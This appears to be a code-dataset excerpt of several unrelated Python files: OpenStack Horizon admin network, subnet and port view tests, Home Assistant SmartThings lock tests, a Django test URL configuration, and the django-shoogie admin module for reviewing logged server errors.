redir_url = reverse('horizon:project:networks:index')
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_get',
'subnet_create',)})
def test_subnet_create_post_subnet_exception(self):
network = self.networks.first()
subnet = self.subnets.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.subnet_create(IsA(http.HttpRequest),
network_id=network.id,
name=subnet.name,
cidr=subnet.cidr,
ip_version=subnet.ip_version,
gateway_ip=subnet.gateway_ip,
enable_dhcp=subnet.enable_dhcp,
tenant_id=subnet.tenant_id)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
form_data = tests.form_data_subnet(subnet, allocation_pools=[])
url = reverse('horizon:admin:networks:addsubnet',
args=[subnet.network_id])
res = self.client.post(url, form_data)
redir_url = reverse('horizon:admin:networks:detail',
args=[subnet.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_get',)})
def test_subnet_create_post_cidr_inconsistent(self):
network = self.networks.first()
subnet = self.subnets.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
self.mox.ReplayAll()
# dummy IPv6 address
cidr = '2001:0DB8:0:CD30:123:4567:89AB:CDEF/60'
form_data = tests.form_data_subnet(
subnet, cidr=cidr, allocation_pools=[])
url = reverse('horizon:admin:networks:addsubnet',
args=[subnet.network_id])
res = self.client.post(url, form_data)
expected_msg = 'Network Address and IP version are inconsistent.'
self.assertContains(res, expected_msg)
@test.create_stubs({api.neutron: ('network_get',)})
def test_subnet_create_post_gw_inconsistent(self):
network = self.networks.first()
subnet = self.subnets.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
self.mox.ReplayAll()
# dummy IPv6 address
gateway_ip = '2001:0DB8:0:CD30:123:4567:89AB:CDEF'
form_data = tests.form_data_subnet(subnet, gateway_ip=gateway_ip,
allocation_pools=[])
url = reverse('horizon:admin:networks:addsubnet',
args=[subnet.network_id])
res = self.client.post(url, form_data)
self.assertContains(res, 'Gateway IP and IP version are inconsistent.')
@test.create_stubs({api.neutron: ('subnet_update',
'subnet_get',)})
def test_subnet_update_post(self):
subnet = self.subnets.first()
api.neutron.subnet_get(IsA(http.HttpRequest), subnet.id)\
.AndReturn(subnet)
api.neutron.subnet_get(IsA(http.HttpRequest), subnet.id)\
.AndReturn(subnet)
api.neutron.subnet_update(IsA(http.HttpRequest), subnet.id,
name=subnet.name,
enable_dhcp=subnet.enable_dhcp,
dns_nameservers=[],
host_routes=[])\
.AndReturn(subnet)
self.mox.ReplayAll()
form_data = tests.form_data_subnet(subnet, allocation_pools=[])
url = reverse('horizon:admin:networks:editsubnet',
args=[subnet.network_id, subnet.id])
res = self.client.post(url, form_data)
redir_url = reverse('horizon:admin:networks:detail',
args=[subnet.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('subnet_update',
'subnet_get',)})
def test_subnet_update_post_gw_inconsistent(self):
subnet = self.subnets.first()
api.neutron.subnet_get(IsA(http.HttpRequest), subnet.id)\
.AndReturn(subnet)
self.mox.ReplayAll()
# dummy IPv6 address
gateway_ip = '2001:0DB8:0:CD30:123:4567:89AB:CDEF'
form_data = tests.form_data_subnet(subnet, gateway_ip=gateway_ip,
allocation_pools=[])
url = reverse('horizon:admin:networks:editsubnet',
args=[subnet.network_id, subnet.id])
res = self.client.post(url, form_data)
self.assertContains(res, 'Gateway IP and IP version are inconsistent.')
@test.create_stubs({api.neutron: ('subnet_delete',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_subnet_delete(self):
self._test_subnet_delete()
@test.create_stubs({api.neutron: ('subnet_delete',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_subnet_delete_with_mac_learning(self):
self._test_subnet_delete(mac_learning=True)
def _test_subnet_delete(self, mac_learning=False):
subnet = self.subnets.first()
network_id = subnet.network_id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.subnet_delete(IsA(http.HttpRequest), subnet.id)
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.subnets.first()])
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
form_data = {'action': 'subnets__delete__%s' % subnet.id}
url = reverse('horizon:admin:networks:detail',
args=[network_id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, url)
@test.create_stubs({api.neutron: ('subnet_delete',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_subnet_delete_exception(self):
self._test_subnet_delete_exception()
@test.create_stubs({api.neutron: ('subnet_delete',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_subnet_delete_exception_with_mac_learning(self):
self._test_subnet_delete_exception(mac_learning=True)
def _test_subnet_delete_exception(self, mac_learning=False):
subnet = self.subnets.first()
network_id = subnet.network_id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.subnet_delete(IsA(http.HttpRequest), subnet.id)\
.AndRaise(self.exceptions.neutron)
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.subnets.first()])
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
form_data = {'action': 'subnets__delete__%s' % subnet.id}
url = reverse('horizon:admin:networks:detail',
args=[network_id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, url)
class NetworkPortTests(test.BaseAdminViewTests):
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',)})
def test_port_detail(self):
self._test_port_detail()
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',)})
def test_port_detail_with_mac_learning(self):
self._test_port_detail(mac_learning=True)
def _test_port_detail(self, mac_learning=False):
port = self.ports.first()
api.neutron.port_get(IsA(http.HttpRequest), port.id)\
.AndReturn(self.ports.first())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:admin:networks:ports:detail',
args=[port.id]))
self.assertTemplateUsed(res, 'project/networks/ports/detail.html')
self.assertEqual(res.context['port'].id, port.id)
@test.create_stubs({api.neutron: ('port_get',)})
def test_port_detail_exception(self):
port = self.ports.first()
api.neutron.port_get(IsA(http.HttpRequest), port.id)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:admin:networks:ports:detail',
args=[port.id]))
# admin DetailView is shared with userpanel one, so
# redirection URL on error is userpanel index.
redir_url = reverse('horizon:project:networks:index')
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_get',
'is_extension_supported',)})
def test_port_create_get(self):
self._test_port_create_get()
@test.create_stubs({api.neutron: ('network_get',
'is_extension_supported',)})
def test_port_create_get_with_mac_learning(self):
self._test_port_create_get(mac_learning=True)
def _test_port_create_get(self, mac_learning=False):
network = self.networks.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:addport',
args=[network.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'admin/networks/ports/create.html')
@test.create_stubs({api.neutron: ('network_get',
'is_extension_supported',
'port_create',)})
def test_port_create_post(self):
self._test_port_create_post()
@test.create_stubs({api.neutron: ('network_get',
'is_extension_supported',
'port_create',)})
def test_port_create_post_with_mac_learning(self):
self._test_port_create_post(mac_learning=True)
def _test_port_create_post(self, mac_learning=False):
network = self.networks.first()
port = self.ports.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
extension_kwargs = {}
if mac_learning:
extension_kwargs['mac_learning_enabled'] = True
api.neutron.port_create(IsA(http.HttpRequest),
tenant_id=network.tenant_id,
network_id=network.id,
name=port.name,
admin_state_up=port.admin_state_up,
device_id=port.device_id,
device_owner=port.device_owner,
**extension_kwargs)\
.AndReturn(port)
self.mox.ReplayAll()
form_data = {'network_id': port.network_id,
'network_name': network.name,
'name': port.name,
'admin_state': port.admin_state_up,
'device_id': port.device_id,
'device_owner': port.device_owner}
if mac_learning:
form_data['mac_state'] = True
url = reverse('horizon:admin:networks:addport',
args=[port.network_id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
redir_url = reverse('horizon:admin:networks:detail',
args=[port.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_get',
'port_create',
'is_extension_supported',)})
def test_port_create_post_exception(self):
self._test_port_create_post_exception()
@test.create_stubs({api.neutron: ('network_get',
'port_create',
'is_extension_supported',)})
def test_port_create_post_exception_with_mac_learning(self):
self._test_port_create_post_exception(mac_learning=True)
def _test_port_create_post_exception(self, mac_learning=False):
network = self.networks.first()
port = self.ports.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
extension_kwargs = {}
if mac_learning:
extension_kwargs['mac_learning_enabled'] = True
api.neutron.port_create(IsA(http.HttpRequest),
tenant_id=network.tenant_id,
network_id=network.id,
name=port.name,
admin_state_up=port.admin_state_up,
device_id=port.device_id,
device_owner=port.device_owner,
**extension_kwargs)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
form_data = {'network_id': port.network_id,
'network_name': network.name,
'name': port.name,
'admin_state': port.admin_state_up,
'mac_state': True,
'device_id': port.device_id,
'device_owner': port.device_owner}
if mac_learning:
form_data['mac_learning_enabled'] = True
url = reverse('horizon:admin:networks:addport',
args=[port.network_id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
redir_url = reverse('horizon:admin:networks:detail',
args=[port.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',)})
def test_port_update_get(self):
self._test_port_update_get()
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',)})
def test_port_update_get_with_mac_learning(self):
self._test_port_update_get(mac_learning=True)
def _test_port_update_get(self, mac_learning=False):
port = self.ports.first()
api.neutron.port_get(IsA(http.HttpRequest),
port.id)\
.AndReturn(port)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:editport',
args=[port.network_id, port.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'admin/networks/ports/update.html')
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',
'port_update')})
def test_port_update_post(self):
self._test_port_update_post()
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',
'port_update')})
def test_port_update_post_with_mac_learning(self):
self._test_port_update_post(mac_learning=True)
def _test_port_update_post(self, mac_learning=False):
port = self.ports.first()
api.neutron.port_get(IsA(http.HttpRequest), port.id)\
.AndReturn(port)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
extension_kwargs = {}
if mac_learning:
extension_kwargs['mac_learning_enabled'] = True
api.neutron.port_update(IsA(http.HttpRequest), port.id,
name=port.name,
admin_state_up=port.admin_state_up,
device_id=port.device_id,
device_owner=port.device_owner,
**extension_kwargs)\
.AndReturn(port)
self.mox.ReplayAll()
form_data = {'network_id': port.network_id,
'port_id': port.id,
'name': port.name,
'admin_state': port.admin_state_up,
'device_id': port.device_id,
'device_owner': port.device_owner}
if mac_learning:
form_data['mac_state'] = True
url = reverse('horizon:admin:networks:editport',
args=[port.network_id, port.id])
res = self.client.post(url, form_data)
redir_url = reverse('horizon:admin:networks:detail',
args=[port.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',
'port_update')})
def test_port_update_post_exception(self):
self._test_port_update_post_exception()
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',
'port_update')})
def test_port_update_post_exception_with_mac_learning(self):
self._test_port_update_post_exception(mac_learning=True)
def _test_port_update_post_exception(self, mac_learning=False):
port = self.ports.first()
api.neutron.port_get(IsA(http.HttpRequest), port.id)\
.AndReturn(port)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
extension_kwargs = {}
if mac_learning:
extension_kwargs['mac_learning_enabled'] = True
api.neutron.port_update(IsA(http.HttpRequest), port.id,
name=port.name,
admin_state_up=port.admin_state_up,
device_id=port.device_id,
device_owner=port.device_owner,
**extension_kwargs)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
form_data = {'network_id': port.network_id,
'port_id': port.id,
'name': port.name,
'admin_state': port.admin_state_up,
'device_id': port.device_id,
'device_owner': port.device_owner}
if mac_learning:
form_data['mac_state'] = True
url = reverse('horizon:admin:networks:editport',
args=[port.network_id, port.id])
res = self.client.post(url, form_data)
redir_url = reverse('horizon:admin:networks:detail',
args=[port.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('port_delete',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_port_delete(self):
self._test_port_delete()
@test.create_stubs({api.neutron: ('port_delete',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_port_delete_with_mac_learning(self):
self._test_port_delete(mac_learning=True)
def _test_port_delete(self, mac_learning=False):
port = self.ports.first()
network_id = port.network_id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.port_delete(IsA(http.HttpRequest), port.id)
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.subnets.first()])
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
form_data = {'action': 'ports__delete__%s' % port.id}
url = reverse('horizon:admin:networks:detail',
args=[network_id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, url)
@test.create_stubs({api.neutron: ('port_delete',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_port_delete_exception(self):
self._test_port_delete_exception()
@test.create_stubs({api.neutron: ('port_delete',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks')})
def test_port_delete_exception_with_mac_learning(self):
self._test_port_delete_exception(mac_learning=True)
def _test_port_delete_exception(self, mac_learning=False):
port = self.ports.first()
network_id = port.network_id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.port_delete(IsA(http.HttpRequest), port.id)\
.AndRaise(self.exceptions.neutron)
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.subnets.first()])
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
form_data = {'action': 'ports__delete__%s' % port.id}
url = reverse('horizon:admin:networks:detail',
args=[network_id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, url)
class NetworkAgentTests(test.BaseAdminViewTests):
@test.create_stubs({api.neutron: ('agent_list',
'network_get',
'list_dhcp_agent_hosting_networks',)})
def test_agent_add_get(self):
network = self.networks.first()
api.neutron.agent_list(IsA(http.HttpRequest), agent_type='DHCP agent')\
.AndReturn(self.agents.list())
api.neutron.network_get(IsA(http.HttpRequest), network.id)\
.AndReturn(network)
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.agents.list())
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:adddhcpagent',
args=[network.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'admin/networks/agents/add.html')
@test.create_stubs({api.neutron: ('agent_list',
'network_get',
'list_dhcp_agent_hosting_networks',
'add_network_to_dhcp_agent',)})
def test_agent_add_post(self):
network = self.networks.first()
agent_id = self.agents.first().id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network.id)\
.AndReturn([self.agents.list()[1]])
api.neutron.network_get(IsA(http.HttpRequest), network.id)\
.AndReturn(network)
api.neutron.agent_list(IsA(http.HttpRequest), agent_type='DHCP agent')\
.AndReturn(self.agents.list())
api.neutron.add_network_to_dhcp_agent(IsA(http.HttpRequest),
agent_id, network.id)\
.AndReturn(True)
self.mox.ReplayAll()
form_data = {'network_id': network.id,
'network_name': network.name,
'agent': agent_id}
url = reverse('horizon:admin:networks:adddhcpagent',
args=[network.id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
redir_url = reverse('horizon:admin:networks:detail',
args=[network.id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('agent_list',
'network_get',
'list_dhcp_agent_hosting_networks',
'add_network_to_dhcp_agent',)})
def test_agent_add_post_exception(self):
network = self.networks.first()
agent_id = self.agents.first().id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network.id)\
.AndReturn([self.agents.list()[1]])
api.neutron.network_get(IsA(http.HttpRequest), network.id)\
.AndReturn(network)
api.neutron.agent_list(IsA(http.HttpRequest), agent_type='DHCP agent')\
.AndReturn(self.agents.list())
api.neutron.add_network_to_dhcp_agent(IsA(http.HttpRequest),
agent_id, network.id)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
form_data = {'network_id': network.id,
'network_name': network.name,
'agent': agent_id}
url = reverse('horizon:admin:networks:adddhcpagent',
args=[network.id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
redir_url = reverse('horizon:admin:networks:detail',
args=[network.id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('subnet_list',
'port_list',
'list_dhcp_agent_hosting_networks',
'is_extension_supported',
'remove_network_from_dhcp_agent',)})
def test_agent_delete(self):
network_id = self.networks.first().id
agent_id = self.agents.first().id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.subnets.first()])
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.remove_network_from_dhcp_agent(IsA(http.HttpRequest),
agent_id, network_id)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(False)
self.mox.ReplayAll()
form_data = {'action': 'agents__delete__%s' % agent_id}
url = reverse('horizon:admin:networks:detail',
args=[network_id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, url)
@test.create_stubs({api.neutron: ('subnet_list',
'port_list',
'list_dhcp_agent_hosting_networks',
'is_extension_supported',
'remove_network_from_dhcp_agent',)})
def test_agent_delete_exception(self):
network_id = self.networks.first().id
agent_id = self.agents.first().id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.subnets.first()])
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.remove_network_from_dhcp_agent(IsA(http.HttpRequest),
agent_id, network_id)\
.AndRaise(self.exceptions.neutron)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(False)
self.mox.ReplayAll()
form_data = {'action': 'agents__delete__%s' % agent_id}
url = reverse('horizon:admin:networks:detail',
args=[network_id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, url)
| apache-2.0 | 6,632,336,158,950,868,000 | 44.156444 | 79 | 0.533866 | false |
jabesq/home-assistant | tests/components/smartthings/test_lock.py | 10 | 4273 | """
Test for the SmartThings lock platform.
The only mocking required is of the underlying SmartThings API object so
real HTTP calls are not initiated during testing.
"""
from pysmartthings import Attribute, Capability
from pysmartthings.device import Status
from homeassistant.components.lock import DOMAIN as LOCK_DOMAIN
from homeassistant.components.smartthings import lock
from homeassistant.components.smartthings.const import (
DOMAIN, SIGNAL_SMARTTHINGS_UPDATE)
from homeassistant.helpers.dispatcher import async_dispatcher_send
from .conftest import setup_platform
async def test_async_setup_platform():
"""Test setup platform does nothing (it uses config entries)."""
await lock.async_setup_platform(None, None, None)
async def test_entity_and_device_attributes(hass, device_factory):
"""Test the attributes of the entity are correct."""
# Arrange
device = device_factory('Lock_1', [Capability.lock],
{Attribute.lock: 'unlocked'})
entity_registry = await hass.helpers.entity_registry.async_get_registry()
device_registry = await hass.helpers.device_registry.async_get_registry()
# Act
await setup_platform(hass, LOCK_DOMAIN, devices=[device])
# Assert
entry = entity_registry.async_get('lock.lock_1')
assert entry
assert entry.unique_id == device.device_id
entry = device_registry.async_get_device(
{(DOMAIN, device.device_id)}, [])
assert entry
assert entry.name == device.label
assert entry.model == device.device_type_name
assert entry.manufacturer == 'Unavailable'
async def test_lock(hass, device_factory):
"""Test the lock locks successfully."""
# Arrange
device = device_factory('Lock_1', [Capability.lock])
device.status.attributes[Attribute.lock] = Status(
'unlocked', None, {
'method': 'Manual',
'codeId': None,
'codeName': 'Code 1',
'lockName': 'Front Door',
'usedCode': 'Code 2'
})
await setup_platform(hass, LOCK_DOMAIN, devices=[device])
# Act
await hass.services.async_call(
LOCK_DOMAIN, 'lock', {'entity_id': 'lock.lock_1'},
blocking=True)
# Assert
state = hass.states.get('lock.lock_1')
assert state is not None
assert state.state == 'locked'
assert state.attributes['method'] == 'Manual'
assert state.attributes['lock_state'] == 'locked'
assert state.attributes['code_name'] == 'Code 1'
assert state.attributes['used_code'] == 'Code 2'
assert state.attributes['lock_name'] == 'Front Door'
assert 'code_id' not in state.attributes
async def test_unlock(hass, device_factory):
"""Test the lock unlocks successfully."""
# Arrange
device = device_factory('Lock_1', [Capability.lock],
{Attribute.lock: 'locked'})
await setup_platform(hass, LOCK_DOMAIN, devices=[device])
# Act
await hass.services.async_call(
LOCK_DOMAIN, 'unlock', {'entity_id': 'lock.lock_1'},
blocking=True)
# Assert
state = hass.states.get('lock.lock_1')
assert state is not None
assert state.state == 'unlocked'
async def test_update_from_signal(hass, device_factory):
"""Test the lock updates when receiving a signal."""
# Arrange
device = device_factory('Lock_1', [Capability.lock],
{Attribute.lock: 'unlocked'})
await setup_platform(hass, LOCK_DOMAIN, devices=[device])
await device.lock(True)
# Act
async_dispatcher_send(hass, SIGNAL_SMARTTHINGS_UPDATE,
[device.device_id])
# Assert
await hass.async_block_till_done()
state = hass.states.get('lock.lock_1')
assert state is not None
assert state.state == 'locked'
async def test_unload_config_entry(hass, device_factory):
"""Test the lock is removed when the config entry is unloaded."""
# Arrange
device = device_factory('Lock_1', [Capability.lock],
{Attribute.lock: 'locked'})
config_entry = await setup_platform(hass, LOCK_DOMAIN, devices=[device])
# Act
await hass.config_entries.async_forward_entry_unload(
config_entry, 'lock')
# Assert
assert not hass.states.get('lock.lock_1')
| apache-2.0 | 5,050,498,303,945,628,000 | 35.211864 | 77 | 0.657852 | false |
dvliman/jaikuengine | .google_appengine/lib/django-1.3/tests/urls.py | 21 | 1690 | from django.conf.urls.defaults import *
urlpatterns = patterns('',
# test_client modeltest urls
(r'^test_client/', include('modeltests.test_client.urls')),
(r'^test_client_regress/', include('regressiontests.test_client_regress.urls')),
# File upload test views
(r'^file_uploads/', include('regressiontests.file_uploads.urls')),
# Always provide the auth system login and logout views
(r'^accounts/login/$', 'django.contrib.auth.views.login', {'template_name': 'login.html'}),
(r'^accounts/logout/$', 'django.contrib.auth.views.logout'),
# test urlconf for {% url %} template tag
(r'^url_tag/', include('regressiontests.templates.urls')),
# django built-in views
(r'^views/', include('regressiontests.views.urls')),
# test urlconf for middleware tests
(r'^middleware/', include('regressiontests.middleware.urls')),
# admin view tests
(r'^test_admin/', include('regressiontests.admin_views.urls')),
(r'^generic_inline_admin/', include('regressiontests.generic_inline_admin.urls')),
# admin widget tests
(r'widget_admin/', include('regressiontests.admin_widgets.urls')),
# test urlconf for syndication tests
(r'^syndication/', include('regressiontests.syndication.urls')),
# conditional get views
(r'condition/', include('regressiontests.conditional_processing.urls')),
# middleware exceptions tests
(r'middleware_exceptions/', include('regressiontests.middleware_exceptions.urls')),
# special headers views
(r'special_headers/', include('regressiontests.special_headers.urls')),
# test util views
(r'test_utils/', include('regressiontests.test_utils.urls')),
)
| apache-2.0 | -2,830,122,244,879,429,000 | 35.73913 | 95 | 0.688757 | false |
altaurog/django-shoogie | shoogie/admin.py | 1 | 6152 | from django.contrib import admin
from django.contrib.admin.views.main import ChangeList
try:
from django.conf.urls import patterns, url
except ImportError:
from django.conf.urls.defaults import patterns, url
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from . import models, utils, views
def get_name(user):
return user.get_full_name() or user.username
class Truncate(object):
max_length = 50
def __init__(self, attrname, max_length=None):
self.attrname = attrname
self.__name__ = attrname
if max_length is not None:
self.max_length = max_length
def __call__(self, instance):
val = getattr(instance, self.attrname, '')
return utils.truncate(val, self.max_length)
class FasterChangeList(ChangeList):
"Defers large fields we don't use"
defer_fields = (
'post_data',
'cookie_data',
'session_data',
'technical_response',
)
# get_query_set() was renamed to get_queryset() in Django 1.6
def get_queryset(self, *args, **kwargs):
changelist = super(FasterChangeList, self)
if hasattr(changelist, 'get_queryset'):
qset = changelist.get_queryset(*args, **kwargs)
else:
qset = changelist.get_query_set(*args, **kwargs)
return qset.defer(*self.defer_fields)
get_query_set = get_queryset
class ServerErrorAdmin(admin.ModelAdmin):
list_display = (Truncate('exception_type', 40),
Truncate('exception_str', 80),
'path_link',
'error_date_format',
'user_link',
'technicalresponse_link',
'resolved',)
date_hierarchy = 'timestamp'
search_fields = ('request_path', 'exception_type', 'exception_str', 'source_file', 'source_function', 'source_text')
actions = ('get_email_list', 'resolve_servererror', 'unresolve_servererror')
exclude = ('technical_response',)
readonly_fields = (
'timestamp',
'hostname',
'request_method',
'request_path',
'query_string',
'post_data',
'cookie_data',
'session_id',
'session_data',
'user',
'exception_type',
'exception_str',
'source_file',
'source_line_num',
'source_function',
'source_text',
)
# queryset() was renamed to get_queryset() in Django 1.6
def get_queryset(self, request):
model_admin = super(ServerErrorAdmin, self)
if hasattr(model_admin, 'get_queryset'):
qset = model_admin.get_queryset(request)
else:
qset = model_admin.queryset(request)
return qset.select_related('user')
queryset = get_queryset
def get_changelist(self, request, **kwargs):
return FasterChangeList
def error_date_format(self, instance):
return instance.timestamp.strftime('%Y-%b-%d %H:%M')
error_date_format.admin_order_field = 'timestamp'
error_date_format.short_description = 'timestamp'
get_request_path = Truncate('request_path', 40)
def path_link(self, instance):
request_path = self.get_request_path(instance)
if 'GET' != instance.request_method:
if instance.request_method:
return u'%s (%s)' % (request_path, instance.request_method)
else:
return request_path
url = u'http://%s%s?%s' % (instance.hostname, instance.request_path, instance.query_string)
return u'<a href="{0}" title="{0}">{1}</a>'.format(url, request_path)
path_link.admin_order_field = 'request_path'
path_link.allow_tags = True
path_link.short_description = 'path'
def user_link(self, instance):
if not instance.user:
return u'(None)'
user = instance.user
url = reverse('admin:auth_user_change', args=(user.id,))
templ = u'<a href="{url}" title="{name}">{username}</a>'
return templ.format(url=url, username=user.username, name=get_name(user))
user_link.admin_order_field = 'user'
user_link.allow_tags = True
user_link.short_description = 'user'
def get_email_list(self, request, queryset):
emails = set()
for se in queryset.select_related('user'):
user = se.user
if user and user.email:
name = get_name(user)
emails.add('"%s" <%s>' % (name, user.email))
return HttpResponse(',\n'.join(emails), mimetype='text/plain')
get_email_list.short_description = 'Get user email addresses for selected errors'
def technicalresponse_link(self, instance):
tr_url = reverse('admin:shoogie_technicalresponse', kwargs={'pk':instance.pk})
return '<a href="%s"><b>debug</b></a>' % tr_url
technicalresponse_link.allow_tags = True
technicalresponse_link.short_description = 'Debug'
def resolve_servererror(self, request, queryset):
update_count = queryset.update(resolved=True)
plural = 's' if update_count != 1 else ''
self.message_user(request, "Marked %d error%s as resolved" % (update_count, plural))
resolve_servererror.short_description = "Mark selected errors as resolved"
def unresolve_servererror(self, request, queryset):
update_count = queryset.update(resolved=False)
plural = 's' if update_count != 1 else ''
self.message_user(request, "Marked %d error%s as not resolved" % (update_count, plural))
unresolve_servererror.short_description = "Mark selected errors as NOT resolved"
def get_urls(self):
myview = views.TechnicalResponseView.as_view()
myurls = patterns('',
url(r'(?P<pk>\d+)/technicalresponse/$',
self.admin_site.admin_view(myview, cacheable=True),
name='shoogie_technicalresponse',
),
)
return myurls + super(ServerErrorAdmin, self).get_urls()
